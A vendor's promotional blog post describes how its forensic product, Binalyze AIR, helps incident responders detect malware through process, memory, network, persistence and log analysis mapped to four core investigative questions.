Binalyze AIR in Action: Detect malware on a potentially infected system

Detecting malware on a potentially infected system requires more than just waiting for alerts—it demands an investigative mindset. Proactive threat hunting and forensic analysis are crucial for uncovering hidden threats that may evade conventional detection. Binalyze AIR empowers teams with the tools to not only respond to known threats but also proactively investigate suspicious activity. By combining automation and deep forensic capabilities with integrated threat detection techniques, AIR transforms investigations into opportunities for uncovering compromises early, reducing risks, and staying ahead of attackers.

Core Four Investigative Priorities

However, as the investigation transitions from evidence exploration to answering critical questions, the focus sharpens on the Core Four investigative priorities that guide most IR investigations:

1. How did the attacker get in? Identifying the entry point helps uncover vulnerabilities and methods of compromise, allowing teams to close the breach and prevent recurrence.

2. Are they still here? Determining the attacker’s current presence is vital for containment and ensures the environment is secure.

3. Which systems and user accounts are affected? Mapping the scope of the attack, including impacted assets and accounts, helps prioritize response actions and reduces further risk.

4. Was any data stolen? Understanding the extent of data exfiltration informs incident reporting, compliance, and mitigation strategies.

Binalyze AIR is designed to help investigators answer these questions quickly and thoroughly, leveraging its effective forensic insights and automated capabilities to provide actionable insights in record time.

By leveraging Binalyze AIR’s forensic and investigative capabilities, you can address these critical questions efficiently. Below, we outline eight investigation strategies supported by AIR that enable teams to gain actionable insights and significantly reduce investigation times by 50-70%.

1. Identify and Analyze Suspicious Processes

Key Question: Are they still here?
Start by examining running processes on the potentially infected system. With AIR’s Process Analyzer, one of over 20 analyzers in DRONE, you can identify unusual processes that stand out due to high resource usage or atypical behavior. Complement this analysis with:

• YARA and Sigma Scans: Use YARA rules tailored to the malware’s characteristics or Sigma rules to detect unusual process creation and privilege escalation. This dual-layered approach ensures that even advanced threats don’t go unnoticed.

But how do you know which assets to prioritize in your investigation?
This is where AIR Auto Asset Tagging shines. By automatically categorizing your assets based on characteristics like device type, user, or criticality, you can focus your efforts on high-value or high-risk assets. For example, if an unusual process appears on a system tagged as a high-priority server, you can escalate your response with confidence and precision.

2. Memory and Disk Forensics

Key Question: Was any data stolen?

Malware often resides in memory or hides in disk storage. AIR facilitates thorough investigative capability with the following:

• The scanning and dumping of live memory: Use AIR’s MITRE ATT&CK Analyzer to analyze memory using YARA rules to detect malware signatures and code snippets. AIR’s acquisition profiles or interACT allows you to capture live memory from your assets.

• Full disk image analysis: With AIR’s File Explorer, scan for obfuscated filenames, hidden files, or unusual directories. Malware often nests in hard-to-spot locations, and AIR helps uncover these traces.

3. Network Connections and Command & Control (C2) Detection

Key Question: How did they get in?

Understanding how malware communicates is crucial. AIR provides tools to track network activity:

• Collect Network Traffic and Active Connections: Identify anomalous connections to suspicious external IPs or non-standard ports. AIR allows users to collect TCP and UDP connections and store the information as a CSV file. It also allows the capture of IP packets as PCAP.

• DNS Analysis: Detect frequent or randomized domain queries, which may indicate the use of Domain Generation Algorithms (DGAs) by malware.

These insights can reveal the initial access vector or an active connection to a Command & Control (C2) server.

4. Investigate Persistence Mechanisms

Key Question: Are they still here?

Malware strives to maintain persistence. Using AIR, you can uncover these mechanisms:

• Persistence Artifact Detection: Search for registry modifications, unauthorized scheduled tasks, and startup folder changes.

• Scheduled Tasks and Registry Analysis: AIR’s Investigation Hub allows you to pinpoint malicious registry keys or unauthorized services that enable malware persistence.

5. Event Log Analysis for Malicious Activity

Key Question: Which systems and user accounts are affected?

Malware activities often leave traces in system logs. AIR’s Investigation Hub helps streamline and consolidate this analysis:

• Event ID Tracking: Focus on Event IDs tied to lateral movement, RDP sessions, or privilege escalations (e.g., Event ID 1029).

• Automated Log Filtering: Filter out noise to zero in on suspicious events like failed logins or unauthorized access attempts.

6. Analyze Suspicious Files and Indicators of Compromise (IoCs)

Key Question: Was any data stolen?

Suspicious files are often the linchpin in malware investigations. AIR provides multiple ways to analyze these artifacts:

• AIR’s remote shell capability: interACT for File Analysis: Collect suspicious files and submit them to VirusTotal or sandbox environments for deeper inspection.

• DRONE’s IoC Detection: Automatically scan collected artifacts for known IoCs, leveraging updated threat intelligence to detect malicious activity.

7. Leverage MITRE ATT&CK TTP Mapping

Key Question: How did they get in?

Understanding attacker tactics is essential for effective response. AIR integrates MITRE ATT&CK to map malware behaviors to specific Tactics, Techniques, and Procedures (TTPs) to enable quick and easy visualization. This includes:

• Lateral Movement: Trace how attackers move across the network.

• Persistence and Privilege Escalation: Detect methods used to maintain and expand access.

8. Automate Ongoing Compromise Assessments and Reporting

Key Question: Are they still here?

Prevention and early detection are as critical as remediation. AIR’s automation capabilities ensure constant vigilance:

• Automated Detection Rules: Schedule scans for key IoCs and suspicious behaviors that EDRs might miss. EDRs excel at real-time detection but may miss deeper or stealthy threats due to their reliance on alerts and predefined rules. Binalyze AIR complements EDRs by collecting over 650 evidence types, enabling comprehensive forensic investigations with tools like timeline analysis and YARA scanning. AIR integrates seamlessly with SIEMs and SOAR platforms, automates workflows, and offers forensic visibility across assets, cloud environments, and air-gapped systems, uncovering threats EDRs might overlook while enabling faster, more thorough incident response.

• Seamless Integration: Pair AIR with your existing EDR/XDR to trigger forensic analysis automatically after alerts.

• Comprehensive Reports: Use AIR’s reporting tools to document findings for immediate action and future resilience.

Conclusion

By addressing the Core Four questions—how attackers got in, whether they’re still active, the scope of the compromise, and the extent of the damage—Binalyze AIR enables investigators to approach security incidents with confidence and speed. From in-depth forensic-level investigations to automated threat hunting, AIR simplifies the investigative process while ensuring no detail is overlooked.

Stay proactive. Equip your team with solutions like Binalyze AIR to turn all security investigations into opportunities for strengthening defenses and building cyber resilience. 

Book a demo today and see how you can answer the Core Four questions in record time.

Check out this blog to see how effortlessly AIR's Investigation Hub simplifies handling malware cases.